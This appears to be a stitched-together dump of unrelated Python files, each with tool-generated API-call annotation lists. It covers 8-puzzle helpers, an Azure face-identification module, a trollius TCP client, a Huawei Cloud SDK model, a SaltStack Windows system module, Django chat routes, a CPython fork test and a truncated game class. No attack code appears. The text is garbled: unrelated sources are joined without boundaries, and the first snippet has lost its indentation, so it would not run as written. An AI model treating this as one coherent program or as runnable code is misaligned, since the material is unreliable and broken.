#counts how many moves it took to reach the board from the start by walking the predecessor map
def distance_from_start(board,pred):
distance = 0
while to_tuple(board) != global_vars.start:
board = pred[to_tuple(board)][0]
distance+=1
return distance
#calculates and returns the Manhattan distance of the board from the goal
def manhattan_distance(board):
goal = global_vars.start_1d
board = to_1d_list(board)
return sum(abs(board_index//3 - goal_index//3) + abs(board_index%3 - goal_index%3)
for board_index, goal_index in ((board.index(i), i) for i in range(1, 9)))
#converts a board to a one-dimensional list
def to_1d_list(board):
x = []
for i in board:
for j in i:
x.append(j)
return x
# converts a given config string, e.g. "1,2,3,...,8", into a 3 by 3 list board
def getValues(args):
temp = []
for i in args.split(","):
temp.append(ord(i) - 48)
temp = [temp[0:3], temp[3:6], temp[6:9]]
return temp
# convert a board to a list of lists and return it
def to_list(board):
result = []
for i in board:
result.append(list(i))
return result
# convert a board to a tuple of tuples and return it
def to_tuple(board):
result = []
for i in board:
result.append(tuple(i))
return tuple(result)
# return True if the state represented by obj is solvable, and False if it's not
def solvable(obj):
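    # For the 3x3 puzzle (odd board width) a move of the blank never changes
    # the parity of the inversion count, so a state is reachable from the
    # goal only if its number of inversions is even.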
temp = []
for i in obj.board:
temp+=i
temp.remove(0)
inversions = 0
# Count number of inversions
for index, i in enumerate(temp):
for j in range(index+1, 8):
if(i > temp[j]):
inversions+=1
# print("Inversions : {}".format(inversions))
if(inversions%2 == 1):
return False
return True
# returns a copy of a given board
def copyBoard(board):
x = []
for i in board:
sub = []
for j in i:
sub.append(j)
x.append(sub)
return x
def clear_scr():
os.system('cls' if os.name == 'nt' else 'clear') #clear the screen for windows and linux
|
[
"os.system"
] |
[((2062, 2110), 'os.system', 'os.system', (["('cls' if os.name == 'nt' else 'clear')"], {}), "('cls' if os.name == 'nt' else 'clear')\n", (2071, 2110), False, 'import os\n')]
|
#
from modules import ilmodule
import requests
import os
import time
import pickledb
import globals
class FaceFinder(ilmodule.ILModule):
def __init__(self):
super().__init__()
        self.people_db = r"g:\Projects\imagelib_github\db\people.pdb"  # raw string keeps the Windows backslashes literal
self.db = pickledb.load(self.people_db, False)
self.face_api_url_prefix = (
"https://northeurope.api.cognitive.microsoft.com/face/v1.0"
)
self.face_api_service_key = os.environ["AZURE_SERVICE_FACE_API_KEY"]
self.person_group = "ourfaces"
self.getMessageBus().subscribe(self.onMessage, globals.TOPIC_FIND_FACE)
def onMessage(self, arg):
self.getLogger().debug("Received message: " + str(arg))
# Prevent too many requests to the API
self.getLogger().debug(
"Prevent too many requests to the API. Waiting for 2 seconds..."
)
time.sleep(2)
self.findFacesOnPicture(arg)
def extractFileName(self, filePath):
return os.path.basename(filePath)
def findFacesOnPicture(self, image_data):
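        # Two-step Azure Face API flow: /detect uploads the raw image bytes and
        # returns a faceId for every face found, then /identify matches those
        # ids against the configured person group; candidate personIds are
        # mapped back to names through the local pickledb cache.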
sourceFile = image_data["image_path"]
self.getLogger().info("Finding faces on picture: " + str(sourceFile))
self.getLogger().debug("Using people database from: " + self.people_db)
face_detect_url = self.face_api_url_prefix + "/detect"
# No "targetFace" means there is only one face detected in the entire image !
face_identify_url = self.face_api_url_prefix + "/identify"
params = {"returnFaceId": "true"}
facesOnPicture = []
# Default empty "placeholder"...
image_data["faces"] = facesOnPicture
try:
data = self.getImageData(sourceFile)
headers = {
"Content-Type": "application/octet-stream",
"Ocp-Apim-Subscription-Key": self.face_api_service_key,
}
params = {"returnFaceId": "true", "returnFaceLandmarks": "true"}
response = requests.post(
face_detect_url, params=params, headers=headers, data=data
)
faceIds = []
if response.status_code == self.HTTP_OK:
faces = response.json()
for f in faces:
faceIds.append(f["faceId"])
self.getLogger().debug("Faces on picture:" + str(faceIds))
else:
self.getLogger().error("Error finding faces! " + response.text)
time.sleep(1)
#
#
if len(faceIds) > 0:
headers = {
"Content-Type": "application/json",
"Ocp-Apim-Subscription-Key": self.face_api_service_key,
}
r = requests.post(
face_identify_url,
headers=headers,
json={
"personGroupId": self.person_group,
"faceIds": faceIds,
"maxNumOfCandidatesReturned": "1",
"confidenceThreshold": "0.5",
},
)
if r.status_code == self.HTTP_OK:
self.getLogger().debug("Some face(s) identified.")
identifiedFaces = r.json()
for idf in identifiedFaces:
for candidate in idf["candidates"]:
self.getLogger().debug(
"Detected: " + self.db.get(candidate["personId"])
)
facesOnPicture.append(self.db.get(candidate["personId"]))
image_data["faces"] = facesOnPicture
else:
self.getLogger().error("Error response code: " + str(r.status_code))
self.getLogger().error(r.text)
else:
self.getLogger().warning("No faces on photo.")
except Exception as e:
self.getLogger().error("Error: " + str(e))
finally:
self.cleanupTmp()
self.getMessageBus().sendMessage(
globals.TOPIC_DESCRIBE_IMAGE, arg=image_data
)
|
[
"requests.post",
"os.path.basename",
"pickledb.load",
"time.sleep"
] |
[((278, 314), 'pickledb.load', 'pickledb.load', (['self.people_db', '(False)'], {}), '(self.people_db, False)\n', (291, 314), False, 'import pickledb\n'), ((901, 914), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (911, 914), False, 'import time\n'), ((1009, 1035), 'os.path.basename', 'os.path.basename', (['filePath'], {}), '(filePath)\n', (1025, 1035), False, 'import os\n'), ((1997, 2070), 'requests.post', 'requests.post', (['face_detect_url'], {'params': 'params', 'headers': 'headers', 'data': 'data'}), '(face_detect_url, params=params, headers=headers, data=data)\n', (2010, 2070), False, 'import requests\n'), ((2485, 2498), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2495, 2498), False, 'import time\n'), ((2759, 2944), 'requests.post', 'requests.post', (['face_identify_url'], {'headers': 'headers', 'json': "{'personGroupId': self.person_group, 'faceIds': faceIds,\n 'maxNumOfCandidatesReturned': '1', 'confidenceThreshold': '0.5'}"}), "(face_identify_url, headers=headers, json={'personGroupId':\n self.person_group, 'faceIds': faceIds, 'maxNumOfCandidatesReturned':\n '1', 'confidenceThreshold': '0.5'})\n", (2772, 2944), False, 'import requests\n')]
|
"""Like source.py, but uses streams."""
from __future__ import print_function
import argparse
import sys
from trollius import *
from trollius import test_utils
ARGS = argparse.ArgumentParser(description="TCP data sink example.")
ARGS.add_argument(
'--tls', action='store_true', dest='tls',
default=False, help='Use TLS')
ARGS.add_argument(
'--iocp', action='store_true', dest='iocp',
default=False, help='Use IOCP event loop (Windows only)')
ARGS.add_argument(
'--stop', action='store_true', dest='stop',
default=False, help='Stop the server by sending it b"stop" as data')
ARGS.add_argument(
'--host', action='store', dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action='store', dest='port',
default=1111, type=int, help='Port number')
ARGS.add_argument(
'--size', action='store', dest='size',
default=16*1024, type=int, help='Data size')
class Debug:
"""A clever little class that suppresses repetitive messages."""
overwriting = False
label = 'stream1:'
def print_(self, *args):
if self.overwriting:
print(file=sys.stderr)
self.overwriting = 0
print(self.label, *args, file=sys.stderr)
def oprint(self, *args):
self.overwriting += 1
end = '\n'
if self.overwriting >= 3:
if self.overwriting == 3:
print(self.label, '[...]', file=sys.stderr)
end = '\r'
print(self.label, *args, file=sys.stderr, end=end)
sys.stdout.flush()
@coroutine
def start(loop, args):
d = Debug()
total = 0
sslctx = None
if args.tls:
d.print_('using dummy SSLContext')
sslctx = test_utils.dummy_ssl_context()
r, w = yield From(open_connection(args.host, args.port, ssl=sslctx))
d.print_('r =', r)
d.print_('w =', w)
if args.stop:
w.write(b'stop')
w.close()
else:
size = args.size
data = b'x'*size
try:
while True:
total += size
d.oprint('writing', size, 'bytes; total', total)
w.write(data)
f = w.drain()
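                # In this old trollius/tulip-era API drain() only returns a
                # waitable when the transport's write buffer is full, so the
                # yield below pauses the writer and applies backpressure.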
if f:
d.print_('pausing')
yield From(f)
except (ConnectionResetError, BrokenPipeError) as exc:
d.print_('caught', repr(exc))
def main():
global args
args = ARGS.parse_args()
if args.iocp:
from trollius.windows_events import ProactorEventLoop
loop = ProactorEventLoop()
set_event_loop(loop)
else:
loop = get_event_loop()
try:
loop.run_until_complete(start(loop, args))
finally:
loop.close()
if __name__ == '__main__':
main()
|
[
"trollius.windows_events.ProactorEventLoop",
"sys.stdout.flush",
"argparse.ArgumentParser",
"trollius.test_utils.dummy_ssl_context"
] |
[((170, 231), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""TCP data sink example."""'}), "(description='TCP data sink example.')\n", (193, 231), False, 'import argparse\n'), ((1537, 1555), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (1553, 1555), False, 'import sys\n'), ((1717, 1747), 'trollius.test_utils.dummy_ssl_context', 'test_utils.dummy_ssl_context', ([], {}), '()\n', (1745, 1747), False, 'from trollius import test_utils\n'), ((2535, 2554), 'trollius.windows_events.ProactorEventLoop', 'ProactorEventLoop', ([], {}), '()\n', (2552, 2554), False, 'from trollius.windows_events import ProactorEventLoop\n')]
|
# coding: utf-8
import pprint
import re
import six
class AgreeTenantAuthorizationV2Req:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'auth_detail_list': 'list[TenantAgreeAuthDetailV2]',
'auth_effective_time': 'int',
'auth_expire_time': 'int',
'group_id': 'str',
'agency_id': 'str'
}
attribute_map = {
'auth_detail_list': 'auth_detail_list',
'auth_effective_time': 'auth_effective_time',
'auth_expire_time': 'auth_expire_time',
'group_id': 'group_id',
'agency_id': 'agency_id'
}
def __init__(self, auth_detail_list=None, auth_effective_time=None, auth_expire_time=None, group_id=None, agency_id=None):
"""AgreeTenantAuthorizationV2Req - a model defined in huaweicloud sdk"""
self._auth_detail_list = None
self._auth_effective_time = None
self._auth_expire_time = None
self._group_id = None
self._agency_id = None
self.discriminator = None
if auth_detail_list is not None:
self.auth_detail_list = auth_detail_list
if auth_effective_time is not None:
self.auth_effective_time = auth_effective_time
if auth_expire_time is not None:
self.auth_expire_time = auth_expire_time
if group_id is not None:
self.group_id = group_id
if agency_id is not None:
self.agency_id = agency_id
@property
def auth_detail_list(self):
"""Gets the auth_detail_list of this AgreeTenantAuthorizationV2Req.
        Authorization detail list
:return: The auth_detail_list of this AgreeTenantAuthorizationV2Req.
:rtype: list[TenantAgreeAuthDetailV2]
"""
return self._auth_detail_list
@auth_detail_list.setter
def auth_detail_list(self, auth_detail_list):
"""Sets the auth_detail_list of this AgreeTenantAuthorizationV2Req.
        Authorization detail list
:param auth_detail_list: The auth_detail_list of this AgreeTenantAuthorizationV2Req.
:type: list[TenantAgreeAuthDetailV2]
"""
self._auth_detail_list = auth_detail_list
@property
def auth_effective_time(self):
"""Gets the auth_effective_time of this AgreeTenantAuthorizationV2Req.
        Authorization effective time
:return: The auth_effective_time of this AgreeTenantAuthorizationV2Req.
:rtype: int
"""
return self._auth_effective_time
@auth_effective_time.setter
def auth_effective_time(self, auth_effective_time):
"""Sets the auth_effective_time of this AgreeTenantAuthorizationV2Req.
        Authorization effective time
:param auth_effective_time: The auth_effective_time of this AgreeTenantAuthorizationV2Req.
:type: int
"""
self._auth_effective_time = auth_effective_time
@property
def auth_expire_time(self):
"""Gets the auth_expire_time of this AgreeTenantAuthorizationV2Req.
        Authorization expiration time
:return: The auth_expire_time of this AgreeTenantAuthorizationV2Req.
:rtype: int
"""
return self._auth_expire_time
@auth_expire_time.setter
def auth_expire_time(self, auth_expire_time):
"""Sets the auth_expire_time of this AgreeTenantAuthorizationV2Req.
        Authorization expiration time
:param auth_expire_time: The auth_expire_time of this AgreeTenantAuthorizationV2Req.
:type: int
"""
self._auth_expire_time = auth_expire_time
@property
def group_id(self):
"""Gets the group_id of this AgreeTenantAuthorizationV2Req.
        Group ID
:return: The group_id of this AgreeTenantAuthorizationV2Req.
:rtype: str
"""
return self._group_id
@group_id.setter
def group_id(self, group_id):
"""Sets the group_id of this AgreeTenantAuthorizationV2Req.
        Group ID
:param group_id: The group_id of this AgreeTenantAuthorizationV2Req.
:type: str
"""
self._group_id = group_id
@property
def agency_id(self):
"""Gets the agency_id of this AgreeTenantAuthorizationV2Req.
        Agency ID
:return: The agency_id of this AgreeTenantAuthorizationV2Req.
:rtype: str
"""
return self._agency_id
@agency_id.setter
def agency_id(self, agency_id):
"""Sets the agency_id of this AgreeTenantAuthorizationV2Req.
        Agency ID
:param agency_id: The agency_id of this AgreeTenantAuthorizationV2Req.
:type: str
"""
self._agency_id = agency_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AgreeTenantAuthorizationV2Req):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"six.iteritems"
] |
[((4917, 4950), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (4930, 4950), False, 'import six\n')]
|
# -*- coding: utf-8 -*-
'''
Support for reboot, shutdown, etc
'''
# Import python libs
import logging
import re
# Import salt libs
import salt.utils
# Set up logging
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'system'
def __virtual__():
'''
This only supports Windows
'''
if not salt.utils.is_windows():
return False
return __virtualname__
def halt(timeout=5):
'''
Halt a running system
CLI Example:
.. code-block:: bash
salt '*' system.halt
'''
return shutdown(timeout)
def init(runlevel):
'''
Change the system runlevel on sysV compatible systems
CLI Example:
.. code-block:: bash
salt '*' system.init 3
'''
#cmd = 'init {0}'.format(runlevel)
#ret = __salt__['cmd.run'](cmd)
#return ret
# TODO: Create a mapping of runlevels to
# corresponding Windows actions
return 'Not implemented on Windows at this time.'
def poweroff(timeout=5):
'''
Poweroff a running system
CLI Example:
.. code-block:: bash
salt '*' system.poweroff
'''
return shutdown(timeout)
def reboot(timeout=5):
'''
Reboot the system
CLI Example:
.. code-block:: bash
salt '*' system.reboot
'''
cmd = 'shutdown /r /t {0}'.format(timeout)
ret = __salt__['cmd.run'](cmd)
return ret
def shutdown(timeout=5):
'''
Shutdown a running system
CLI Example:
.. code-block:: bash
salt '*' system.shutdown
'''
cmd = 'shutdown /s /t {0}'.format(timeout)
ret = __salt__['cmd.run'](cmd)
return ret
def shutdown_hard():
'''
Shutdown a running system with no timeout or warning
CLI Example:
.. code-block:: bash
salt '*' system.shutdown_hard
'''
cmd = 'shutdown /p /f'
ret = __salt__['cmd.run'](cmd)
return ret
def set_computer_name(name):
'''
Set the Windows computer name
CLI Example:
.. code-block:: bash
salt 'minion-id' system.set_computer_name 'DavesComputer'
'''
cmd = ('wmic computersystem where name="%COMPUTERNAME%"'
' call rename name="{0}"')
    log.debug('Attempting to change computer name. Cmd is: {0}'.format(cmd))
ret = __salt__['cmd.run'](cmd.format(name))
if 'ReturnValue = 0;' in ret:
ret = {'Computer Name': {'Current': get_computer_name()}}
pending = get_pending_computer_name()
if pending not in (None, False):
ret['Computer Name']['Pending'] = pending
return ret
return False
def get_pending_computer_name():
'''
Get a pending computer name. If the computer name has been changed, and the
change is pending a system reboot, this function will return the pending
computer name. Otherwise, ``None`` will be returned. If there was an error
retrieving the pending computer name, ``False`` will be returned, and an
error message will be logged to the minion log.
CLI Example:
.. code-block:: bash
salt 'minion-id' system.get_pending_computer_name
'''
current = get_computer_name()
cmd = ('reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control'
'\\ComputerName\\ComputerName /v ComputerName')
output = __salt__['cmd.run'](cmd)
pending = None
for line in output.splitlines():
try:
pending = re.search(
r'ComputerName\s+REG_SZ\s+(\S+)',
line
).group(1)
break
except AttributeError:
continue
if pending is not None:
return pending if pending != current else None
log.error('Unable to retrieve pending computer name using the '
'following command: {0}'.format(cmd))
return False
def get_computer_name():
'''
Get the Windows computer name
CLI Example:
.. code-block:: bash
salt 'minion-id' system.get_computer_name
'''
cmd = 'net config server'
lines = __salt__['cmd.run'](cmd).splitlines()
for line in lines:
if 'Server Name' in line:
_, srv_name = line.split('Server Name', 1)
return srv_name.strip().lstrip('\\')
return False
def set_computer_desc(desc):
'''
Set the Windows computer description
CLI Example:
.. code-block:: bash
salt 'minion-id' system.set_computer_desc 'This computer belongs to Dave!'
'''
cmd = 'net config server /srvcomment:"{0}"'.format(desc)
__salt__['cmd.run'](cmd)
return {'Computer Description': get_computer_desc()}
set_computer_description = set_computer_desc
def get_computer_desc():
'''
Get the Windows computer description
CLI Example:
.. code-block:: bash
salt 'minion-id' system.get_computer_desc
'''
cmd = 'net config server'
lines = __salt__['cmd.run'](cmd).splitlines()
for line in lines:
if 'Server Comment' in line:
_, desc = line.split('Server Comment', 1)
return desc.strip()
return False
get_computer_description = get_computer_desc
def join_domain(domain, username, passwd, ou, acct_exists=False):
'''
    Join a computer to an Active Directory domain
CLI Example:
.. code-block:: bash
salt 'minion-id' system.join_domain 'mydomain.local' 'myusername' \
'<PASSWORD>' 'OU=MyClients;OU=MyOrg;DC=myDom;DC=local'
'''
FJoinOptions = 3
if acct_exists:
FJoinOptions = 1
cmd = ('wmic /interactive:off ComputerSystem Where '
'name="%computername%" call JoinDomainOrWorkgroup FJoinOptions={0} '
'Name="{1}" UserName="{2}" Password="{3}" '
'AccountOU="{4}"'
).format(FJoinOptions, domain, username, passwd, ou)
ret = __salt__['cmd.run'](cmd)
if 'ReturnValue = 0;' in ret:
return {'Domain': domain}
return False
def get_system_time():
'''
Get the Windows system time
CLI Example:
.. code-block:: bash
salt '*' system.get_system_time
'''
cmd = 'time /T'
return __salt__['cmd.run'](cmd)
def set_system_time(newtime):
'''
Set the Windows system time
CLI Example:
.. code-block:: bash
salt '*' system.set_system_time '11:31:15 AM'
'''
cmd = 'time {0}'.format(newtime)
return not __salt__['cmd.retcode'](cmd)
def get_system_date():
'''
Get the Windows system date
CLI Example:
.. code-block:: bash
salt '*' system.get_system_date
'''
cmd = 'date /T'
return __salt__['cmd.run'](cmd)
def set_system_date(newdate):
'''
Set the Windows system date. Use <mm-dd-yy> format for the date.
CLI Example:
.. code-block:: bash
salt '*' system.set_system_date '03-28-13'
'''
cmd = 'date {0}'.format(newdate)
return not __salt__['cmd.retcode'](cmd)
def start_time_service():
'''
Start the Windows time service
CLI Example:
.. code-block:: bash
salt '*' system.start_time_service
'''
return __salt__['service.start']('w32time')
def stop_time_service():
'''
Stop the Windows time service
CLI Example:
.. code-block:: bash
salt '*' system.stop_time_service
'''
return __salt__['service.stop']('w32time')
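# --- Hedged usage sketch, not part of the Salt module ---
# Salt normally injects __salt__ at loader time; stubbing it below lets the
# generated command strings be checked without a Windows minion, assuming the
# module's own imports resolve. The stub callables are illustrative only.
if __name__ == '__main__':
    issued = []
    __salt__ = {
        'cmd.run': lambda cmd: issued.append(cmd) or 'ok',
        'cmd.retcode': lambda cmd: 0,
        'service.start': lambda name: True,
        'service.stop': lambda name: True,
    }
    print(reboot(timeout=10))             # records 'shutdown /r /t 10'
    print(set_system_time('11:31:15 AM'))  # True when cmd.retcode returns 0
    print(start_time_service())
    print(issued)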
|
[
"re.search",
"logging.getLogger"
] |
[((175, 202), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (192, 202), False, 'import logging\n'), ((3421, 3472), 're.search', 're.search', (['"""ComputerName\\\\s+REG_SZ\\\\s+(\\\\S+)"""', 'line'], {}), "('ComputerName\\\\s+REG_SZ\\\\s+(\\\\S+)', line)\n", (3430, 3472), False, 'import re\n')]
|
import subprocess
def get_diff(path):
if not path.startswith("/"):
path = "/" + path
result = subprocess.run(
["git", "-C", path, "diff", "--staged"], capture_output=True, encoding="utf8"
)
return result.stdout
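# --- Hedged usage sketch ---
# The repository path below is an illustrative assumption; get_diff() simply
# returns whatever `git diff --staged` prints for that path.
if __name__ == '__main__':
    print(get_diff('/tmp/example-repo'))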
|
[
"subprocess.run"
] |
[((113, 210), 'subprocess.run', 'subprocess.run', (["['git', '-C', path, 'diff', '--staged']"], {'capture_output': '(True)', 'encoding': '"""utf8"""'}), "(['git', '-C', path, 'diff', '--staged'], capture_output=True,\n encoding='utf8')\n", (127, 210), False, 'import subprocess\n')]
|
from rest_framework import routers
from .views import ChatViewSet
from .views import TalkViewSet
from . import views
from django.urls import path
chat_router = routers.DefaultRouter()
chat_router.register(r'', ChatViewSet)
talk_router = routers.DefaultRouter()
talk_router.register(r'', TalkViewSet)
app_name = 'chat'
urlpatterns = [
path('search_chat', views.search_chat, name='search_chat'),
path('fetch_my_chat', views.fetch_my_chat, name='fetch_my_chat'),
path('fetch_latest_talk', views.fetch_latest_talk, name='fetch_latest_talk'),
path('fetch_all_talk', views.fetch_all_talk, name='fetch_all_talk'),
path('fetch_chat_with_user_id', views.fetch_chat_with_user_id, name='fetch_chat_with_user_id'),
path('post_talk', views.post_talk, name='post_talk'),
path('fetch_chat_unread_total_count/', views.fetch_chat_unread_total_count, name='fetch_chat_unread_total_count'),
path('reset_chat_unread_count', views.reset_chat_unread_count, name='reset_chat_unread_count'),
path('fetch_chat_list_for_chat_list_page',
views.fetch_chat_list_for_chat_list_page,
name='fetch_chat_list_for_chat_list_page'),
]
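# --- Hedged usage sketch, not part of this app's urls.py ---
# chat_router and talk_router are built above but never appended to
# urlpatterns here; a project-level urls.py would typically mount them. The
# prefixes below are illustrative assumptions.
# from django.urls import include, path
# from chat.urls import chat_router, talk_router
# urlpatterns = [
#     path('chat/', include('chat.urls', namespace='chat')),
#     path('api/chats/', include(chat_router.urls)),
#     path('api/talks/', include(talk_router.urls)),
# ]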
|
[
"django.urls.path",
"rest_framework.routers.DefaultRouter"
] |
[((162, 185), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (183, 185), False, 'from rest_framework import routers\n'), ((240, 263), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (261, 263), False, 'from rest_framework import routers\n'), ((344, 402), 'django.urls.path', 'path', (['"""search_chat"""', 'views.search_chat'], {'name': '"""search_chat"""'}), "('search_chat', views.search_chat, name='search_chat')\n", (348, 402), False, 'from django.urls import path\n'), ((408, 472), 'django.urls.path', 'path', (['"""fetch_my_chat"""', 'views.fetch_my_chat'], {'name': '"""fetch_my_chat"""'}), "('fetch_my_chat', views.fetch_my_chat, name='fetch_my_chat')\n", (412, 472), False, 'from django.urls import path\n'), ((478, 554), 'django.urls.path', 'path', (['"""fetch_latest_talk"""', 'views.fetch_latest_talk'], {'name': '"""fetch_latest_talk"""'}), "('fetch_latest_talk', views.fetch_latest_talk, name='fetch_latest_talk')\n", (482, 554), False, 'from django.urls import path\n'), ((560, 627), 'django.urls.path', 'path', (['"""fetch_all_talk"""', 'views.fetch_all_talk'], {'name': '"""fetch_all_talk"""'}), "('fetch_all_talk', views.fetch_all_talk, name='fetch_all_talk')\n", (564, 627), False, 'from django.urls import path\n'), ((633, 732), 'django.urls.path', 'path', (['"""fetch_chat_with_user_id"""', 'views.fetch_chat_with_user_id'], {'name': '"""fetch_chat_with_user_id"""'}), "('fetch_chat_with_user_id', views.fetch_chat_with_user_id, name=\n 'fetch_chat_with_user_id')\n", (637, 732), False, 'from django.urls import path\n'), ((733, 785), 'django.urls.path', 'path', (['"""post_talk"""', 'views.post_talk'], {'name': '"""post_talk"""'}), "('post_talk', views.post_talk, name='post_talk')\n", (737, 785), False, 'from django.urls import path\n'), ((791, 908), 'django.urls.path', 'path', (['"""fetch_chat_unread_total_count/"""', 'views.fetch_chat_unread_total_count'], {'name': '"""fetch_chat_unread_total_count"""'}), "('fetch_chat_unread_total_count/', views.fetch_chat_unread_total_count,\n name='fetch_chat_unread_total_count')\n", (795, 908), False, 'from django.urls import path\n'), ((910, 1009), 'django.urls.path', 'path', (['"""reset_chat_unread_count"""', 'views.reset_chat_unread_count'], {'name': '"""reset_chat_unread_count"""'}), "('reset_chat_unread_count', views.reset_chat_unread_count, name=\n 'reset_chat_unread_count')\n", (914, 1009), False, 'from django.urls import path\n'), ((1010, 1147), 'django.urls.path', 'path', (['"""fetch_chat_list_for_chat_list_page"""', 'views.fetch_chat_list_for_chat_list_page'], {'name': '"""fetch_chat_list_for_chat_list_page"""'}), "('fetch_chat_list_for_chat_list_page', views.\n fetch_chat_list_for_chat_list_page, name=\n 'fetch_chat_list_for_chat_list_page')\n", (1014, 1147), False, 'from django.urls import path\n')]
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import threading
import time
import unittest
from test.fork_wait import ForkWait
from test import support
# Skip test if fork does not exist.
support.get_attribute(os, 'fork')
class ForkTest(ForkWait):
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
exitcode = 42
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(exitcode)
else:
if support.verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid, exitcode=exitcode)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
exitcode = 42
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if support.verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(exitcode)
self.wait_impl(pid, exitcode=exitcode)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
def tearDownModule():
support.reap_children()
if __name__ == "__main__":
import unittest
unittest.main()
|
[
"unittest.main",
"test.support.reap_children",
"test.support.get_attribute",
"threading.Thread",
"time.sleep",
"os.kill",
"os._exit",
"threading.Event",
"os.fork",
"_imp.acquire_lock",
"_imp.release_lock"
] |
[((253, 286), 'test.support.get_attribute', 'support.get_attribute', (['os', '"""fork"""'], {}), "(os, 'fork')\n", (274, 286), False, 'from test import support\n'), ((3244, 3267), 'test.support.reap_children', 'support.reap_children', ([], {}), '()\n', (3265, 3267), False, 'from test import support\n'), ((3320, 3335), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3333, 3335), False, 'import unittest\n'), ((470, 487), 'threading.Event', 'threading.Event', ([], {}), '()\n', (485, 487), False, 'import threading\n'), ((934, 967), 'threading.Thread', 'threading.Thread', ([], {'target': 'importer'}), '(target=importer)\n', (950, 967), False, 'import threading\n'), ((1052, 1061), 'os.fork', 'os.fork', ([], {}), '()\n', (1059, 1061), False, 'import os\n'), ((642, 660), '_imp.acquire_lock', 'imp.acquire_lock', ([], {}), '()\n', (658, 660), True, 'import _imp as imp\n'), ((765, 781), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (775, 781), False, 'import time\n'), ((903, 921), '_imp.release_lock', 'imp.release_lock', ([], {}), '()\n', (919, 921), True, 'import _imp as imp\n'), ((1968, 1996), 'os.kill', 'os.kill', (['pid', 'signal.SIGKILL'], {}), '(pid, signal.SIGKILL)\n', (1975, 1996), False, 'import os\n'), ((2980, 2998), 'os._exit', 'os._exit', (['exitcode'], {}), '(exitcode)\n', (2988, 2998), False, 'import os\n'), ((1432, 1450), 'os._exit', 'os._exit', (['exitcode'], {}), '(exitcode)\n', (1440, 1450), False, 'import os\n'), ((1603, 1614), 'os._exit', 'os._exit', (['(1)'], {}), '(1)\n', (1611, 1614), False, 'import os\n'), ((2562, 2571), 'os.fork', 'os.fork', ([], {}), '()\n', (2569, 2571), False, 'import os\n'), ((2480, 2498), '_imp.acquire_lock', 'imp.acquire_lock', ([], {}), '()\n', (2496, 2498), True, 'import _imp as imp\n'), ((2705, 2723), '_imp.release_lock', 'imp.release_lock', ([], {}), '()\n', (2721, 2723), True, 'import _imp as imp\n'), ((2905, 2916), 'os._exit', 'os._exit', (['(1)'], {}), '(1)\n', (2913, 2916), False, 'import os\n')]
|
from .Layers import Layer,TileLayer,FXLayer
from Lib import Vector,Img
from Engine import Items
from . import Tiles,Player
from random import shuffle
from Objects import War
V=Vector.VectorX
exp=Img.sndget("bomb")
class Area(object):
backcol=(0,0,0)
infinite=False
large=False
explored=()
building=None
anitick=0
ebuffer=0
emax=10
def __init__(self,bounds,generator,building):
self.bounds=bounds
self.layers=[TileLayer(16,"Tiles"),Layer(16,"Ore"),Layer(16,"Overlay"),Layer(16,"Conv"),Layer(16,"Items"),Layer(0,"Objects"),Layer(-32,"Air"),FXLayer("FX")]
self.ldict = {l.name: l for l in self.layers}
self.ups=set()
self.mups=set()
self.targets=set()
self.gen=generator
self.building=building
if not self.large:
generator.generate(self)
def spawn(self,nobj,pos):
for l in nobj.layers:
self.ldict[l][pos]=nobj
